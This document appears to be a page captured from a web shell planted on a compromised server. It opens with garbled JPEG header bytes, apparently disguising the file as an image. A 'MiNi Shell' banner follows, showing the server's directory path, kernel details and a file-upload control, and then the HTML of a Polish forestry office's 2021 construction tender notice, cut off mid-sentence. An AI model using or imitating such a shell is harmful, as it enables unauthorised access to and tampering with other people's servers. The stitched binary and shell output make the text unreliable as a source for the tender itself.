JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210908/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210908/0017486801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa samodzielnej kancelarii leśniczego w Leśnictwie Otanów wraz z niezbędną infrastrukturą techniczną i zagospodarowaniem terenu na działce o nr ewid.63/14,245/3,gm.Myślibórz,obręb Otanów III post. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Myślibórz</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 810539232</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dworcowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Myślibórz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">74-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL427 - Szczecinecko-pyrzycki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">95 747 23 81</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mysliborz@szczecin.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://mysliborz.szczecin.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa samodzielnej kancelarii leśniczego w Leśnictwie Otanów wraz z niezbędną infrastrukturą techniczną i zagospodarowaniem terenu na działce o nr ewid.63/14,245/3,gm.Myślibórz,obręb Otanów III post. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-045cf469-0dc2-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00174868</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00065383/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Budowa samodzielnej kancelarii Leśnictwa Otanów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/nadlesnictwo_mysliborz <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Zamawiający będzie komunikował<br/>się z Wykonawcami przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy<br/>SmartPZP, pod adresem https://portal.smartpzp.pl/nadlesnictwo_mysliborz</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu środków komunikacji<br/>elektronicznej, za pośrednictwem Platformy SmartPZP (dalej:„Platforma”). Wszelkie oświadczenia,<br/>wnioski, zawiadomienia oraz informacje, przekazywane są w zakładce „Korespondencja”. Sposób<br/>sporządzenia i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznej musi być zgody z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U.<br/>z 2020 r. poz. 2452). Za datę wpływu oświadczeń, ofert, wniosków, zaświadczeń oraz informacji<br/>przyjmuje się datę ich przekazania do Platformy. Aktualna data i godzina, zsynchronizowane z<br/>Głównym Urzędem Miar, wyświetlane są w prawym górnym rogu Platformy. W celu skorzystania z<br/>Platformy konieczna jest rejestracja Wykonawcy pod adresem:<br/>https://portal.smartpzp.pl/nadlesnictwo_mysliborz po kliknięciu na przycisk „Załóż konto”. Wykonawca<br/>rejestrując się akceptuje warunki korzystania z Platformy, określone w Regulaminie podczas rejestracji<br/>oraz uznaje go za wiążący. Korzystanie z Platformy jest bezpłatne. Podgląd i pobieranie dokumentacji<br/>postępowania nie wymaga logowania. Zamawiający, informuje, że Platforma jest kompatybilna ze<br/>wszystkimi podpisami elektronicznymi. Do przesłania dokumentów i złożenia oferty nie jest niezbędne<br/>posiadanie certyfikatu kwalifikowanego. Minimalne wymagania techniczne dotyczące korzystania z Platformy: a) przesyłane dokumenty powinny być załączone w formie plików w formacie odpowiednio<br/>.png, .jpg, .jpeg, .gif, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .ods, .odp, .odf, .pdf, .zip, .rar, .7zip, .txt,<br/>.ath, .xml, .dwg, .xades, .tar, .7z, .eml, .msg; b) wymagania sprzętowe dla Wykonawcy: (i) przeglądarka<br/>internetowa Mozzilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze lub Opera ver. 58<br/>i późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11, (ii) lista zalecanych przeglądarek<br/>internetowych: Google Chrome, Mozilla Firefox, Opera. Zalecane jest używanie najnowszych wersji<br/>przeglądarek, (iii) system operacyjny Windows 7 i późniejsze, (iv) zainstalowane środowisko Java w<br/>wersji min. 1.8 (jre), (v) w przypadku przeglądarek Opera, Chrome i Firefox należy doinstalować<br/>dodatek do przeglądarki Szafir SDK Web, (vi) oprogramowanie SzafirHost w systemie operacyjnym,<br/>(vii) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 1 Mb/s, (viii)<br/>komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 3 GB RAM, procesor 1500 MHz<br/>lub lepszy, jeden z systemów operacyjnych Linux Kernel 4.0, Windows 7 i MacOS 10.12 - lub ich<br/>nowsze wersje, (ix) zainstalowany program Acrobat Reader lub inny umożliwiający obsługę formatów<br/>.pdf. Pozostałe wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów<br/>elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy<br/>ich użyciu opisane zostały w Regulaminie korzystania z Platformy. Maksymalny rozmiar plików<br/>przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty oraz<br/>do komunikacji wynosi 100 MB. Za pośrednictwem Systemu można przesłać wiele pojedynczych<br/>plików lub plik skompresowany do archiwum (ZIP) zawierający wiele pojedynczych plików. Wymagania<br/>techniczne i organizacyjne dotyczące korespondencji elektronicznej opisane zostały w rozdziale 10<br/>SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.1.4.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na budowie budynku biurowego (samodzielnej kancelarii leśniczego) w leśnictwie Otanów wraz z niezbędną infrastrukturą techniczną i zagospodarowaniem terenu na działce o nr ewid. 63/14, 245/3; gmina:<br/>Myślibórz, obręb: Otanów wraz z uzyskaniem ostatecznej decyzji o pozwoleniu na użytkowanie.<br/>Zamawiający wymaga, aby budowa budynku kancelarii realizowana była w technologii drewnianej z wykorzystaniem prefabrykowanych gotowych elementów oraz montażu na placu budowy tych elementów (modułów) ściennych, dachowych, stropowych. 1. Zamawiający przewiduje realizację przedmiotu zamówienia w dwóch etapach: Etap I i Etap II.<br/>2. Zamawiający wymaga wykonania w terminie do dnia 20.12.2021 r. następujących robót<br/>przewidzianych w Etapie I (szczegółowo opisany w dokumentacji projektowej, specyfikacji<br/>technicznej i przedmiarach robót):<br/>A) W ramach branży ogólnobudowlanej planuje się wykonać budynek w stanie "deweloperskim"<br/>bez wyposażenia, powłok malarskich i okładzin z płytek.<br/>Zagospodarowanie terenu planuje się wykonać w całości bez ogrodzenia oraz zjazdu<br/>publicznego.<br/>B) W ramach prac branży elektrycznej planuje się wykonać w budynku wszystkie prace bez tzw.<br/>białego montażu, pomiarów elektrycznych oraz osprzętu szaf systemu SWiN i LAN. Nie<br/>przewiduje się także montażu lamp oświetleniowych.<br/>C) W ramach branży instalacji sanitarnych planuje się do wykonania wszystkie prace poza tzw.<br/>białym montażem oraz grzejnikami zawieszanymi na ścianie, anemostatami i centralą<br/>wentylacyjną.<br/>Zamawiający wymaga wykonania robót przewidzianych w Etapie II (szczegółowo opisanych w<br/>dokumentacji projektowej, specyfikacji technicznej i przedmiarach robót):<br/>A) Zakres robót planowanych do wykonania w roku 2022 , z zastrzeżeniem pkt 5.1. SWZ<br/>obejmuje roboty niewykonane w roku 2021.<br/>Wykonanie wszystkich prac w ramach Etapu II będzie równocześnie zakończeniem wykonania<br/>całego przedmiotu umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45212000-6 - Roboty budowlane w zakresie budowy wypoczynkowych, sportowych, kulturalnych, hotelowych i restauracyjnych obiektów budowlanych</p> <p class="mb-0">45222000-9 - Roboty budowlane w zakresie robót inżynieryjnych, z wyjątkiem mostów, tuneli, szybów i kolei podziemnej</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45232310-8 - Roboty budowlane w zakresie linii telefonicznych</p> <p class="mb-0">45232460-4 - Roboty sanitarne</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45312200-9 - Instalowanie przeciwwłamaniowych systemów alarmowych</p> <p class="mb-0">45314320-0 - Instalowanie okablowania komputerowego</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331200-8 - Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45331210-1 - Instalowanie wentylacji</p> <p class="mb-0">45331211-8 - Instalowanie wentylacji zewnętrznej</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <p class="mb-0">45343000-3 - Roboty instalacyjne przeciwpożarowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">270 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą ofertę zostanie uznana oferta Wykonawcy, która<br/>uzyska największą liczbę punktów w ramach kryteriów oceny oferty określonych w rozdziale 16 SWZ tj. cena oraz przedłużenie minimalnego okresu gwarancji jakości.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie minimalnego okresu gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku<br/>zdolności do występowania w obrocie gospodarczym.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów.<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku<br/>posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>3) sytuacji ekonomicznej lub finansowej.<br/>Warunek w odniesieniu do sytuacji ekonomicznej lub finansowej, zostanie spełniony, jeśli<br/>Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową o wartości nie<br/>mniejszej niż 120 000,00 zł (słownie złotych: sto dwadzieścia tysięcy 00/100).<br/>4) zdolności technicznej lub zawodowej.<br/>a) Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli Wykonawca<br/>wykaże, że w okresie ostatnich 5 lat od dnia w którym upływa termin składania ofert (a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie) wykonał co najmniej jedną robotę<br/>budowlaną (przez robotę budowlaną rozumie się wykonywanie prac na podstawie 1 umowy)<br/>polegającą na budowie budynku całorocznego w technologii drewnianej (o drewnianej<br/>konstrukcji ścian, stropów, dachu), obejmującej wykonanie robót branży budowlanej, sanitarnej i<br/>elektrycznej o łącznej wartości zadania nie mniejszej niż 250 000,00 zł brutto.<br/>Pod pojęciem budowy należy rozumieć wykonywanie obiektu budowlanego w określonym<br/>miejscu, a także odbudowę, rozbudowę lub nadbudowę obiektu budowlanego (art. 3 pkt 6<br/>ustawy Prawo budowlane),<br/>b) Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do potencjału<br/>technicznego,<br/>c) Warunek ten, w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia,<br/>zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponował co<br/>najmniej po jednej osobie na:<br/>- kierownik budowy (co najmniej 1 osoba) - Posiadającą uprawnienia budowlane do kierowania<br/>robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń wydane<br/>zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2020<br/>r., poz. 1333 ze zm., dalej – „Prawo budowlane”) lub odpowiadające im ważne uprawnienia<br/>budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub<br/>odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru<br/>Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych<br/>przepisów ustawy Prawo budowlane oraz ustawy z dnia 22 grudnia 2015 r. o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej<br/>(tekst jedn. Dz. U. z 2020 r., poz. 220 z późn. zm.), które uprawniają do pełnienia samodzielnych<br/>funkcji technicznych w budownictwie przy realizacji przedmiotu zamówienia, biorąc pod uwagę<br/>jego zakres.<br/>- kierownik robót sanitarnych (co najmniej 1 osoba) - Posiadającą uprawnienia do kierowania<br/>robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,<br/>wydane zgodnie z przepisami ustawy Prawo budowlane lub odpowiadające im ważne<br/>uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących<br/>przepisów lub odpowiadające im uprawnienia wydane obywatelom państw Europejskiego<br/>Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych<br/>przepisów ustawy Prawo budowlane oraz ustawy z dnia 22 grudnia 2015 r. o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej<br/>(tekst jedn. Dz. U. z 2020r., poz. 220 z późn. zm.), które uprawniają do pełnienia samodzielnych<br/>funkcji technicznych w budownictwie przy realizacji przedmiotu zamówienia, biorąc pod uwagę<br/>jego zakres.<br/>- kierownik robót elektrycznych (co najmniej 1 osoba) - Posiadającą uprawnienia do kierowania<br/>robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, wydane zgodnie z przepisami ustawy<br/>Prawo budowlane lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane<br/>na podstawie wcześniej obowiązujących przepisów lub odpowiadające im uprawnienia wydane<br/>obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z<br/>zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane oraz ustawy z dnia 22<br/>grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (tekst jedn. Dz. U. z 2020 r., poz. 220 z późn. zm.), które<br/>uprawniają do pełnienia samodzielnych funkcji technicznych w budownictwie przy realizacji<br/>przedmiotu zamówienia, biorąc pod uwagę jego zakres. Zamawiający dopuszcza realizację<br/>zamówienia przez jedną lub dwie osoby posiadające łącznie ww. kwalifikacje. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia Zamawiający<br/>działając na podst.art.274ust.1PZPwezwie Wykonawcę,którego oferta została najwyżej oceniona,do<br/>złożenia w wyznaczonym terminie,nie krótszym niż5dni od dnia wezwania,aktualnych na dzień<br/>złożenia następujących podmiotowych środków dowodowych:1)informacji z Krajowego Rejestru<br/>Karnego w zakresie: a)art.108ust.1pkt1i2PZP,b)art.108ust.1pkt4PZP,dot.orzeczenia zakazu ubiegania<br/>się o zamówienie publiczne tytułem środka karnego–sporządzonej nie wcześniej niż6miesięcy przed jej<br/>złożeniem;2)oświadczenia Wykonawcy,w zakresie art.108 ust.1pkt5PZP,o braku przynależności do tej<br/>samej grupy kapitałowej,w rozumieniu ustawy z dn.16.02.2007r.o ochronie konkurencji i<br/>konsumentów(tekst jedn.Dz.U.z2021r.poz.275)z innym Wykonawcą,który złożył odrębną ofertę albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej<br/>grupy kapitałowej;3)zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego,że<br/>Wykonawca nie zalega z opłacaniem podatków i opłat,w zakresie art.109 ust.1pkt1)PZP,wystawionego<br/>nie wcześniej niż3miesiące przed jego złożeniem,a w przypadku zalegania z opłaceniem podatków lub<br/>opłat wraz z zaświadczeniem,Zamawiający żąda złożenia dokumentów potwierdzających,że przed<br/>upływem 